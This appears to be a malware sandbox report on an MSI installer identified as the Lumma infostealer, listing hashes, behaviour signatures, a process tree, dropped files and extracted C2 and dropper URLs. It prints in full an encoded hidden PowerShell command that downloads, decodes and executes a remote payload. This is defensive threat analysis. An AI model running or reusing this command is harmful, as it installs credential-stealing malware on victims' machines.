Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

2eae05e829...bd.msi

windows7-x64

6

2eae05e829...bd.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/10/2024, 01:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd.msi

  • Size

    54.5MB

  • MD5

    2d6151dbbbb50c077564ef7ffc971a4e

  • SHA1

    b67ec6dd683f5f8b12d52aa79aeee9a498380589

  • SHA256

    2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd

  • SHA512

    22a30787cf820da489ed59b8f6401b1282b923a66f796211c2300f1864f4f10bee01d24133bfcb35975695f32273796cacdef03d726345c7a12cfb8ce6509979

  • SSDEEP

    1572864:0p+Ty2SfWnHDk8FjVbfzPTq4h+RZYoFczfDiQPU8azMCAJ:h/0WnHDkkjBPTq4kYoFefTPU8awCm

Score
10/10
lummadiscoveryexecutionpersistenceprivilege_escalationstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://last-blink.com/2709.bs64

Extracted

Family

lumma

C2

https://gravvitywio.store/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 20 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3828
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B5EE3563ADF1AF76C2B2C81F999255CA
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2264
    • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\UnRAR.exe
      "C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\guirq.rar" "C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\"
      2⤵
      • Executes dropped EXE
      PID:860
    • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\NVIDIA GeForce Experience.exe
      "C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\NVIDIA GeForce Experience.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe explorer.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbABhAHMAdAAtAGIAbABpAG4AawAuAGMAbwBtAC8AMgA3ADAAOQAuAGIAcwA2ADQAIgApADsAWwBCAHkAdABlAFsAXQBdACAAJAB4AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAcwAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACIAYgAiACkALgBSAGUAcABsAGEAYwBlACgAIgBAACIALAAiAGgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJAAiACwAIgBtACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACUAIgAsACIAcAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAiAHYAIgApACkAOwBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeAAuAEMAbwB1AG4AdAA7ACQAaQArACsAKQB7ACQAeABbACQAaQBdAD0AIAAoACQAeABbACQAaQBdACAALQBiAHgAbwByACAAMQA2ADcAKQAgAC0AYgB4AG8AcgAgADEAOAB9ADsAaQBlAHgAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHgAKQApAA==
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e57caa6.rbs
    Filesize

    339KB

    MD5

    7fcd3712fae2dd873a4d4f1194127360

    SHA1

    699d03f590789ca2de6d7304d9943522ac49ab54

    SHA256

    2f630ad82ef140ba7aceea5dd11699415ea5b906de3662c622b6fc076166851d

    SHA512

    59cb1a3e3492c63984b23c8254d9b290aa929ba7fe7c0a4867e477d4f29e9f5dd715dd59f0e4c95cda74f53868a082a05d58a6cadd7a2cdd51973378d4f9d282

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
    Filesize

    174B

    MD5

    2fd854c8dfebdecf9ce753a294fbb016

    SHA1

    a4ef5883f873691d36e9079043d638703cd050d1

    SHA256

    070774c8af76f587708d31edad70a3e4d09f7625e4622663eec368fbe39365b0

    SHA512

    bf6927eeb54af76deff59ff9c5e024b7640c29ec8072aa8b3e9cb340950bbe561072ad7c5ed56d98f7aa623d942410aacbc584355bebe56dc9fe91725a913637

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
    Filesize

    170B

    MD5

    58d39900b05d4a27355544f9339f3eef

    SHA1

    816438f26939696d386d0853847eb5a1973ba192

    SHA256

    285a2592233323eaec270c1ddb98a32db9cf4444b54aff0b4012c9b4dcfbd240

    SHA512

    f721dc571a03169f57c4c763835faa7adea0dab7a29e8741070b95a6007a2f355a611d58d9f242064e6ec893f82c822f8b6670237eb3f25ff0751cc546348e28

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xqpuogg1.yh5.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\NVIDIA GeForce Experience.exe
    Filesize

    3.2MB

    MD5

    bbe60e23dd94fbb56e878eacb5f1a44c

    SHA1

    b08f8b87efc450368816c769c8c1c54ff6da53b9

    SHA256

    65da40ab4ef47a5b513c268f15ac9b2dfef203f87394a1ded33b1ebe1c474669

    SHA512

    2faaca8a4676143ae628ae64c75b8b99dbf82380eb2a82efc560aa5a58c999ace46fa82f144e214322aaa7e57e8ae3bae5acab903e91c1071279c6ca7370b75e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\UnRAR.exe
    Filesize

    494KB

    MD5

    98ccd44353f7bc5bad1bc6ba9ae0cd68

    SHA1

    76a4e5bf8d298800c886d29f85ee629e7726052d

    SHA256

    e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

    SHA512

    d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\d3dcompiler_47.dll
    Filesize

    4.3MB

    MD5

    d060ecb1fc660ee3151f342184aa4352

    SHA1

    eaec5ccfcfcf6a65c4f115f921beb9e053df5590

    SHA256

    689672965c5792a9b85f7ee18a85a147d45b92370837c3a5bcfdefcef3f3828e

    SHA512

    13673ed85ec141f4ac210838bd6a3b3e084976f1005a9158f71da3adf8e10d0b3d61e50bfed08b3431d1f4a025ad54e9daca10922e5940d998a5ad45504b22cb

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\guirq.rar
    Filesize

    310KB

    MD5

    87daf01078a7a7aca146db8de935b97e

    SHA1

    6aa0e88ef8d274f08409c63d5e2fe885e1c45d62

    SHA256

    d8387af9263f8427b2eaaef4a20d2c2951316caf69dbddd59df0eabe9e8901d2

    SHA512

    361f9533007097279fb2e37138d2cea7daf5ac013d6d1c8a52bf6cbb96874441df0cee14ba989526aeec385fb1435d551f65704fbd7d56f9159be17507899418

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Haye Cosq\NoqotApp\libcef.dll
    Filesize

    889KB

    MD5

    603063caa087b2baf3be97713f498fb3

    SHA1

    49d2f2c8f8454272c2f2f2ef8f0238426bc9dfc3

    SHA256

    75261f095b5a37374addd8287179bc0a708d3835ddaa571756dfc8f10bf45e95

    SHA512

    c5bc473f53654e2d80800eb6efad54653aa2de06fb97d5a6fae091c1cb3308ffd4aff36f7cee0ce5126af8516d5455fd2d615a256d919330b832029fbd79e561

    Download Submit

  • C:\Windows\Installer\MSICB5E.tmp
    Filesize

    738KB

    MD5

    b158d8d605571ea47a238df5ab43dfaa

    SHA1

    bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

    SHA256

    ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

    SHA512

    56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

    Download Submit

  • C:\Windows\Installer\MSICD85.tmp
    Filesize

    870KB

    MD5

    6119e62d8047032a715ba0670fc476c5

    SHA1

    52e639024460bf111c469e95fb011c07d6fc89e8

    SHA256

    bc31f85266df2cdfdbe22149937105388fa3adc17e3646fa4a167736e819af77

    SHA512

    e7301fa21f01f7f7562b853e9bb246ed051951e3cef152bb0b3558d4863f141edbbc0c4d439c30f51f9997805490f131a5e4cd00872b61ccb08ba9d200f811d8

    Download Submit

  • C:\Windows\Installer\MSICDA5.tmp
    Filesize

    1.1MB

    MD5

    1a2b237796742c26b11a008d0b175e29

    SHA1

    cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

    SHA256

    81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

    SHA512

    3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

    Download Submit

  • C:\Windows\Installer\MSIE509.tmp
    Filesize

    314KB

    MD5

    61123cbc153cb7f178ddbb318a7ea000

    SHA1

    0cfb1faa4c166d2a335ee62b05dd62b730ded9d6

    SHA256

    e5e0183dfd9f65406042762c0427bbcff010402b9934dadd2bddbb6c382d625c

    SHA512

    3249f814c9e4c472b5962ab159729bb44e28314e2e402abf4b5ec6789cb729192b662c948d362fa71f4284038544e4fdbb8f6d55b6ec0fb92c4de04840a15926

    Download Submit

  • C:\Windows\Installer\MSIE5C6.tmp
    Filesize

    364KB

    MD5

    54d74546c6afe67b3d118c3c477c159a

    SHA1

    957f08beb7e27e657cd83d8ee50388b887935fae

    SHA256

    f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

    SHA512

    d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

    Download Submit

  • memory/1584-220-0x0000000000380000-0x00000000003A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1584-222-0x0000000000380000-0x00000000003A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1584-221-0x0000000000380000-0x00000000003A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1584-286-0x0000000000380000-0x00000000003A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1584-287-0x0000000000380000-0x00000000003A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1900-225-0x000001EEB4510000-0x000001EEB4532000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1900-244-0x000001EEB49D0000-0x000001EEB49EC000-memory.dmp

    Filesize

    112KB

    Download

  • memory/1900-279-0x000001EEB4E10000-0x000001EEB4FD2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1900-280-0x000001EEB5510000-0x000001EEB5A38000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/2500-216-0x000001CC9ABE0000-0x000001CC9ABE1000-memory.dmp

    Filesize

    4KB

    Download